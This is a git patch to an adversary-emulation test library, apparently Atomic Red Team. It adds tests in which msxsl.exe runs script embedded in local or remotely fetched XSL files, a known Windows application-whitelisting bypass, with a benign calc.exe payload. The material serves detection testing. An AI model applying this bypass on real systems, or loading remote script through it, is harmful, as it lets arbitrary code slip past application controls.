From 03adb61ee49d5900b571dcaba7ddeb3291b51d1f Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 14 Sep 2018 20:35:48 -0500 Subject: [PATCH] Added remote test, simplified script file --- atomics/T1127/T1127.md | 42 ++++++++++++++++++++++++++++++ atomics/T1127/T1127.yaml | 27 ++++++++++++++++--- atomics/T1127/src/msxsl-script.xsl | 5 +--- atomics/index.md | 4 +++ atomics/windows-index.md | 4 +++ 5 files changed, 74 insertions(+), 8 deletions(-) diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md index 527b2b34..5a8f0dd3 100644 --- a/atomics/T1127/T1127.md +++ b/atomics/T1127/T1127.md @@ -58,6 +58,10 @@ Contributors: Casey Smith, Matthew Demaske, Adaptforward - [Atomic Test #1 - MSBuild Bypass Using Inline Tasks](#atomic-test-1---msbuild-bypass-using-inline-tasks) +- [Atomic Test #2 - MSXSL Bypass using local files](#atomic-test-2---msxsl-bypass-using-local-files) + +- [Atomic Test #3 - MSXSL Bypass using remote files](#atomic-test-3---msxsl-bypass-using-remote-files) +
@@ -77,3 +81,41 @@ Executes the code in a project file using. C# Example C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} ```
+
+ +## Atomic Test #2 - MSXSL Bypass using local files +Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xmlfile | Location of the test XML file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml| +| xslfile | Location of the test XSL script file on the local filesystem. | Path | C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl| + +#### Run it with `command_prompt`! +``` +C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} +``` +
+
+ +## Atomic Test #3 - MSXSL Bypass using remote files +Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. + +**Supported Platforms:** Windows + + +#### Inputs +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| xmlfile | Remote location (URL) of the test XML file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml| +| xslfile | Remote location (URL) of the test XSL script file. | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl| + +#### Run it with `command_prompt`! +``` +C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} +``` +
diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 143a4617..96d51568 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -17,21 +17,40 @@ atomic_tests: command: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename} -- name: MSXSL Bypass +- name: MSXSL Bypass using local files description: | - Executes the code specified within a XSL script tag during XSL transformation. Requires download of MSXSL from Microsoft. + Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. supported_platforms: - windows input_arguments: xmlfile: - description: Location of the test XML file. May be a URL. + description: Location of the test XML file on the local filesystem. type: Path default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-xmlfile.xml xslfile: - description: Location of the test XSL script file. May be a URL. + description: Location of the test XSL script file on the local filesystem. type: Path default: C:\AtomicRedTeam\atomics\T1127\src\msxsl-script.xsl executor: name: command_prompt command: | C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} + +- name: MSXSL Bypass using remote files + description: | + Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. + supported_platforms: + - windows + input_arguments: + xmlfile: + description: Remote location (URL) of the test XML file. + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-xmlfile.xml + xslfile: + description: Remote location (URL) of the test XSL script file. + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1127/src/msxsl-script.xsl + executor: + name: command_prompt + command: | + C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile} diff --git a/atomics/T1127/src/msxsl-script.xsl b/atomics/T1127/src/msxsl-script.xsl index 81949e27..0c41e651 100644 --- a/atomics/T1127/src/msxsl-script.xsl +++ b/atomics/T1127/src/msxsl-script.xsl @@ -5,10 +5,7 @@ xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:user="http://mycompany.com/mynamespace"> - function xml(nodelist) { -var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); - return nodelist.nextNode().xml; - } + var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c C:\Windows\System32\calc.exe"); diff --git a/atomics/index.md b/atomics/index.md index c423c08e..2d3d48b7 100644 --- a/atomics/index.md +++ b/atomics/index.md @@ -262,6 +262,8 @@ - Atomic Test #3: Set a file's creation timestamp [linux, macos] - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -495,6 +497,8 @@ - Atomic Test #1: Trap [macos, centos, ubuntu, linux] - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows] diff --git a/atomics/windows-index.md b/atomics/windows-index.md index e16c7ac8..049f9ead 100644 --- a/atomics/windows-index.md +++ b/atomics/windows-index.md @@ -91,6 +91,8 @@ - [T1099 Timestomp](./T1099/T1099.md) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -408,6 +410,8 @@ - T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1127 Trusted Developer Utilities](./T1127/T1127.md) - Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows] + - Atomic Test #2: MSXSL Bypass using local files [windows] + - Atomic Test #3: MSXSL Bypass using remote files [windows] - T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1047 Windows Management Instrumentation](./T1047/T1047.md) - Atomic Test #1: WMI Reconnaissance Users [windows]